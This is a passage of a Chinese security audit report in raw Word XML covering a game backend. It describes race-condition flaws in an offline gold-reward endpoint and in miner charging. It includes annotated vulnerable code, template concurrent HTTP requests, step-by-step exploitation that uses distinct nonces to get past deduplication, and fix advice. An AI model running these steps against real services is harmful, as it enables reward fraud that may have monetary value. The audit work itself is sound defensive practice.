        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndStartTime...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 查询做去重，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>数据库层无 `(user_id, start_time)` 唯一索引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的迹象（代码中未见任何唯一约束兜底）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两次并发请求均在对方尚未 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>save()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 前完成查询，均得到"空列表"，随即均执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>save()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，产生两条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(userId, startTime, status=0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 完全相同的重复记录。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">若下游存在 "领取" 或"批量发放"逻辑对所有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录逐条发放金币，则每个被重复创建的记录均可兑现一次离线收益，导致用户获取双倍（或多倍）金币奖励。结合 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>withdrawManage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 路径存在提现管理接口，金币可能具有实际价值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="753"/>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TokenAuthFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 验证 Bearer Token 并将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 写入 request 属性（攻击者不可伪造）；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/offline/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 执行签名校验（仅需一次合法 App Key/Secret 即可）。一旦通过这两层过滤，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>calcAndClaim(userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 被调用，其内部"查 → 存"两步无事务保护，并发窗口始终存在。</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入口：OfflineRewardController.java</w:t>
              <w:br/>
              <w:t>@PostMapping("/calcAndClaim")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;OfflineRewardDto&gt; calcAndClaim(@CurrentUserId Long userId) { // ← userId 来自 Token，不可伪造</w:t>
              <w:br/>
              <w:t xml:space="preserve">    OfflineRewardDto record = offlineRewardService.calcAndClaim(userId); // ← 触发下游竞态点</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success(record);</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service：OfflineRewardService.java — 注意：方法上无 @Transactional</w:t>
              <w:br/>
              <w:t>public OfflineRewardDto calcAndClaim(Long userId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ... banCheck ...</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    UserSessionLog userSessionLog = sessionLogOptional.get();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    LocalDateTime offlineStartTime = userSessionLog.getEndTime(); // ← 用作去重 key</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // ——— 竞态窗口开始 ———</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 应用层去重查询（无事务，无数据库唯一索引兜底）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    List&lt;OfflineRewardRecord&gt; offlineRewardRecordList =</w:t>
              <w:br/>
              <w:t xml:space="preserve">        offlineRewardRecordRepository.findByUserIdAndStartTimeOrderByCreateTimeDesc(userId, offlineStartTime); // ← 并发时两个请求均得到空列表</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    if (!offlineRewardRecordList.isEmpty()) {            // ← 并发时两个请求均走 false 分支，均跳过此保护</w:t>
              <w:br/>
              <w:t xml:space="preserve">        ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return transfer(...);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // 两个并发请求均执行到这里，各自 new 一条记录</w:t>
              <w:br/>
              <w:t xml:space="preserve">    OfflineRewardRecord record = new OfflineRewardRecord();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    record.setUserId(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    record.setStartTime(offlineStartTime);    // ← 两条记录 startTime 相同</w:t>
              <w:br/>
              <w:t xml:space="preserve">    record.setStatus(0);                      // ← 两条记录均为 status=0（待发放）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    record.setFinalRewardAmount(baseReward);  // ← 金币数额相同</w:t>
              <w:br/>
              <w:t xml:space="preserve">    record = offlineRewardRecordRepository.save(record); // ← 两个请求均 INSERT 成功，数据库无唯一约束阻拦</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ——— 竞态窗口结束：此时数据库中存在两条相同的 status=0 记录 ———</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    return transfer(record, maxHours);</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同时发送两个并发请求（使用同一有效 Token 和签名）：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/api/offline/calcAndClaim HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者的有效Token&gt;</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;合法AppKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;当前时间戳&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;随机nonce_1&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;按签名算法计算的合法签名_1&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>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/api/offline/calcAndClaim HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者的有效Token&gt;</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;合法AppKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;当前时间戳&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;随机nonce_2（与nonce_1不同以通过nonce去重）&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;按签名算法计算的合法签名_2&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:b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利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="754"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用合法用户账号登录，获取有效 Bearer Token；获取合法的 App Key / Secret 用于生成请求签名（注意每个请求需独立 nonce 以绕过 nonce 去重）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="755"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在同一时刻并发发送 2 个（或更多）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /api/offline/calcAndClaim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 请求，共享同一 Token（userId 相同），但每个请求使用不同 nonce；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="756"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">若竞态触发，数据库 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>offline_reward_record</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表中将出现两条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>user_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>start_time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 完全相同、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的记录；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="757"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">待下游"领取/发放"流程批量处理所有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录时，两条记录均被发放金币，用户获得双倍离线收益；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="758"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>可循环利用：若用户每次下线后均执行此操作，可持续倍增离线金币收入。</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：响应均返回 200，数据库出现重复 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录，用户最终获得双倍或多倍金币奖励。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="759"/>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760"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：普通注册用户（持有合法 Bearer Token + 能获取 App Key/Secret 的客户端用户）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📌 修复建议（仅供参考）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="761"/>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(user_id, start_time)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 上添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>数据库唯一索引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">作为兜底，依赖数据库在并发 INSERT 时抛出 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>DuplicateKeyException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="762"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">同时在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>calcAndClaim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法上添加 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 并配合 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT ... FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 或 Redis 分布式锁（粒度为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），确保查-存操作的原子性；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="763"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">捕获 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>DuplicateKeyException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 并按幂等语义返回已有记录。</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764"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>OfflineRewardController.java.calcAndClaim → OfflineRewardService.java.calcAndClaim → OfflineRewardService.java.applyOfflineGoldCap</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audit_m163_599_calcAndClaim_ctrl-path5of6.md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：PowerService.java#charge</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_35" w:id="35"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞34：矿机充电重复防护存在 TOCTOU 竞态条件——可绕过「不可重复充电」限制并产生多条充电奖励记录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="76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：矿机充电操作 TOCTOU 竞态条件导致重复充电记录与多次奖励结算</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="76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src/main/java/com/gameBack/mjservice/service/PowerService.java:charge</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="76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76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6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77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charge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法在检查矿机「是否已充电」时，对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserMiner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 实体使用的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>普通 SELECT（无悲观锁）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">；而对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserPower</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 电力余额使用的是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
